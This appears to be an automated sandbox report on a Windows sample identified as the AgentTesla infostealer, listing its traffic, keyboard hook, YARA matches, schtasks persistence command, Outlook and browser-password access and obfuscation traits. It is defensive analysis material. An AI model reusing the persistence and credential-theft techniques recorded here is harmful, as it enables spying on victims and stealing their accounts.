              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 | Host: api.ipify.org | Connection: Keep-Alive
              Source: unknown | HTTPS traffic detected: 52.20.78.240:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.6:49720 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Window created: window name: CLIPBRDWNDCLASS
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Window created: window name: CLIPBRDWNDCLASS

              System Summary

              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.2cfbae8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 12.2.nrQtAokXKaSn.exe.2b4ba4c.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, <PrivateImplementationDetails>{B0063866-9900-46A9-BAF8-C30A0EC83145}/40AC4BAE-6FAD-49F9-ADA9-9C669FAB2230.cs | Large array initialization: .cctor: array initializer size 10995
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.2cfbae8.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 12.2.nrQtAokXKaSn.exe.2b4ba4c.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Code function: 0_2_029EC624
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Code function: 0_2_029EE918
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Code function: 0_2_029EE908
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_02C5FC18
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_02C56D40
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_0692F2E8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_06929100
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_0692AEE8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_0692E97C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_069225F8
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.345081208.00000000073D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.327264541.0000000003EB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevaoPXhU.exeH vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename2f5267af-d0fd-4225-915c-9145a26ede74.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000000.257511638.0000000000762000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevaoPXhU.exeH vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCassa.dll< vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename2f5267af-d0fd-4225-915c-9145a26ede74.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000000.315508703.0000000000438000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename2f5267af-d0fd-4225-915c-9145a26ede74.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.524125934.0000000000CF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeBinary or memory string: OriginalFilenamevaoPXhU.exeH vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: nrQtAokXKaSn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeReversingLabs: Detection: 31%
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe {path}
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe {path}
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmpCC0B.tmp
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe {path}
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe {path}
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile created: C:\Users\user\AppData\Local\Temp\tmp152E.tmp
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/5@8/3
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile read: C:\Users\user\Desktop\desktop.ini
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.538141931.0000000002F45000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.538732210.0000000002B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3408:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_01
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeMutant created: \Sessions\1\BaseNamedObjects\OGrkiBVSf
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csCryptographic APIs: 'CreateDecryptor'
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csCryptographic APIs: 'CreateDecryptor'
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: vaoPXhU.pdb source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, nrQtAokXKaSn.exe.0.dr

              Data Obfuscation

              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.cs.Net Code: j7QkTWEuuxfsufhdJqx System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.cs.Net Code: j7QkTWEuuxfsufhdJqx System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.cs.Net Code: j7QkTWEuuxfsufhdJqx System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
              Source: initial sampleStatic PE information: section name: .text entropy: 7.457613017086461
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csHigh entropy of concatenated method names: '.cctor', 'ILvBvLsgDaWEH', 'gdMh44R7dy', 'mpWhJ0DwjU', 'I23hLHMKEG', 'nVyhZqdKfw', 'r9ThKqgi8D', 'x6BhnVXs0E', 'GXYhOjn8mG', 'Ba9hAJKArV'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/RF0rtnYZvHqeZZQmad.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'rbWCBAlkmD', 'BYrhkD7lnt', 'bOUhrVkeY6', 'rZth64JWqh', 'N1GhBhq1bd', 'mnhhuai7hm', 'gVbhX8SHDY', 'UWJhWdhBPe'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/xofaJsuXhoEZWIMVbx.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'w6KW6iuZ3C', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'K5fh3tNoBD', 'fvIhI4MtSm', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/XpgD7ix0Tc2tXfIVtE.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'A9mWBY6is4', 'K5fh3tNoBD', 'fvIhI4MtSm', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/M8y7RpwCvSV1iRZqGt.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'QckoesBIdE', 'BYrhkD7lnt', 'bOUhrVkeY6', 'XI8K8cJrgK', 'S0hKo16Hd2', 'C9aKGlyMn6', 'fcaKncAJlR', 'eT6KQo5CBm'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/cXSiYCEvRKO91GCE3S.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'dvGHDFjM1', 'rKJjTGMbWD', 'rtAjgVCNjh', 'QIojZhSlWt', 'I2FjEbEZoE', 'W1XjeaB1IA', 'uxEjRiIBJO', 'DfojfkBBD7'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/gCYF5Hms6cLTc6i3Fq.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'RbA1O63flB', 'K5fh3tNoBD', 'fvIhI4MtSm', 'yg4Kqobx5C', 'i4FKYmCy6E', 'KGE0bkLocg', 'YqN0dC3xxO', 'RmDK3s2RXH'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/V89IOPlyboSofKxcqg.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'lyv1I26HJ3', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'KrF0u61N2j', 'Ci10X3KiGR', 'tch00UKtac', 'd8J0NeP2MA', 'raI0hq4ftb'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.csHigh entropy of concatenated method names: '.ctor', 'bKRCCtDOmB', 'yYxCWkcsU3', 'h8PComFFyA', 'fLyC1NFYFr', 'g1YChkUc4o', 'PPdCsTsGs3', 'kPmCEjukFe', 'Dispose', 'lNECD1q2WL'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/VDWvhfkhVNLBgIpXl5.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'wYyoOGAXNE', 'K5fh3tNoBD', 'fvIhI4MtSm', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V', 't6shnEPT5Z', 'VT9h232c2x'
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csHigh entropy of concatenated method names: '.cctor', 'ILvBvLsgDaWEH', 'gdMh44R7dy', 'mpWhJ0DwjU', 'I23hLHMKEG', 'nVyhZqdKfw', 'r9ThKqgi8D', 'x6BhnVXs0E', 'GXYhOjn8mG', 'Ba9hAJKArV'
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/RF0rtnYZvHqeZZQmad.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'rbWCBAlkmD', 'BYrhkD7lnt', 'bOUhrVkeY6', 'rZth64JWqh', 'N1GhBhq1bd', 'mnhhuai7hm', 'gVbhX8SHDY', 'UWJhWdhBPe'
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/XpgD7ix0Tc2tXfIVtE.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'A9mWBY6is4', 'K5fh3tNoBD', 'fvIhI4MtSm', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V'
